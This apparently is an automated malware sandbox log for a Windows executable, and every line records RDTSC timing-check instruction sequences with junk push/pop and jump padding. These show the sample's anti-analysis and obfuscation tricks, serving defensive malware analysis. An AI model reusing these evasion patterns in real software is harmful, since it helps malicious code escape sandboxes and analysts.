Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7AF37 second address: B7AF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7AF3B second address: B7AF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7B1F6 second address: B7B243 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC3A8C81766h 0x00000008 jmp 00007FC3A8C8176Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FC3A8C8176Fh 0x00000015 push edi 0x00000016 jo 00007FC3A8C81766h 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007FC3A8C8176Dh 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 ja 00007FC3A8C81772h 0x0000002c jo 00007FC3A8C81766h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7F02D second address: B7F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7F032 second address: B7F047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnc 00007FC3A8C81766h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7F047 second address: B7F04C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7F04C second address: B7F063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jp 00007FC3A8C81766h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7F1A1 second address: B7F1DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC3A8C83B48h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 jl 00007FC3A8C83B36h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC3A8C83B3Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81913 second address: B81917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B81917 second address: B8192C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B3Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B87495 second address: B874E7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC3A8C81772h 0x0000000f jmp 00007FC3A8C8176Ch 0x00000014 popad 0x00000015 pushad 0x00000016 jne 00007FC3A8C8176Ch 0x0000001c jp 00007FC3A8C81768h 0x00000022 jmp 00007FC3A8C8176Bh 0x00000027 pushad 0x00000028 jns 00007FC3A8C81766h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86306 second address: B86312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007FC3A8C83B36h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B868F2 second address: B868F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86A14 second address: B86A19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86CCA second address: B86CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86CCE second address: B86CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B86E04 second address: B86E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8B71D second address: B8B723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8B723 second address: B8B730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FC3A8C81766h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8B730 second address: B8B736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8BF54 second address: B8BF7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FC3A8C81773h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8BF7D second address: B8BF88 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C0EC second address: B8C0F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C272 second address: B8C28E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B48h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C54A second address: B8C580 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC3A8C81770h 0x0000000a jo 00007FC3A8C81766h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC3A8C81778h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C6C1 second address: B8C701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Dh 0x00000007 jmp 00007FC3A8C83B48h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC3A8C83B43h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3DF24 second address: B3DF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B903D0 second address: B903E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B903E0 second address: B903E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9582F second address: B9584B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B46h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9584B second address: B95874 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC3A8C81781h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B95874 second address: B95878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9472F second address: B94758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007FC3A8C81766h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC3A8C81770h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94758 second address: B9475C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56741 second address: B5676C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC3A8C81766h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007FC3A8C81777h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56BB3 second address: B56BC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FC3A8C83B3Ch 0x0000000f jns 00007FC3A8C83B36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56C2A second address: B56C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56C34 second address: B56C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jo 00007FC3A8C83B3Ch 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 jbe 00007FC3A8C83B4Fh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC3A8C83B3Eh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56C80 second address: B56CAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81775h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC3A8C81772h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56CAE second address: B56CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FC3A8C83B38h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 call 00007FC3A8C83B39h 0x00000026 push ebx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56CE7 second address: B56CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3A8C8176Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56CFD second address: B56D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e pushad 0x0000000f jmp 00007FC3A8C83B3Eh 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56D2E second address: B56D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56E5A second address: B56E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56E5E second address: B56E84 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC3A8C81775h 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56E84 second address: B56EAB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 xchg eax, esi 0x00000008 call 00007FC3A8C83B3Dh 0x0000000d jmp 00007FC3A8C83B3Bh 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56F7A second address: B56FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC3A8C8177Eh 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jmp 00007FC3A8C81771h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56FB7 second address: B56FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56FBB second address: B56FD4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3A8C8176Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B571B3 second address: B571D8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3A8C83B46h 0x00000008 jmp 00007FC3A8C83B40h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FC3A8C83B38h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B571D8 second address: B571DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B571DE second address: B571E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B571E2 second address: B57258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FC3A8C81768h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 call 00007FC3A8C81770h 0x00000028 mov dword ptr [ebp+12475215h], esi 0x0000002e pop edi 0x0000002f push 00000004h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FC3A8C81768h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b mov edx, ebx 0x0000004d sbb dh, 0000007Bh 0x00000050 nop 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jc 00007FC3A8C81766h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94A14 second address: B94A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C83B43h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94D0C second address: B94D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94D10 second address: B94D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94D1A second address: B94D37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94D37 second address: B94D41 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC3A8C83B3Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94E80 second address: B94E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B94E8B second address: B94E97 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B95457 second address: B9545B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9938B second address: B993C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC3A8C83B3Dh 0x0000000a pop ebx 0x0000000b jmp 00007FC3A8C83B47h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FC3A8C83B3Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B993C7 second address: B993E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC3A8C81773h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B993E0 second address: B993E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B17353 second address: B17357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B17357 second address: B17372 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC3A8C83B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FC3A8C83B36h 0x00000015 ja 00007FC3A8C83B36h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B17372 second address: B17391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81779h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D641 second address: B9D645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9D645 second address: B9D64D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9E3CD second address: B9E3DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FC3A8C83B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9E3DD second address: B9E3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9E6EB second address: B9E6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9E6EF second address: B9E6F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9E6F5 second address: B9E704 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC3A8C83B3Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1D8B second address: BA1D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1D91 second address: BA1D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1D99 second address: BA1D9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1D9F second address: BA1DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1DAD second address: BA1DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1DB2 second address: BA1DCE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FC3A8C83B3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FC3A8C83B36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1DCE second address: BA1DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0ED61 second address: B0ED70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jng 00007FC3A8C83B36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0ED70 second address: B0ED74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA1559 second address: BA158A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B3Eh 0x00000009 jns 00007FC3A8C83B36h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jno 00007FC3A8C83B42h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA158A second address: BA159A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C8176Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA16C6 second address: BA16D9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jc 00007FC3A8C83B36h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA186D second address: BA18A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC3A8C81777h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push edi 0x0000000d pushad 0x0000000e jmp 00007FC3A8C81774h 0x00000013 jng 00007FC3A8C81766h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA587E second address: BA5883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA5883 second address: BA5892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC3A8C81766h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
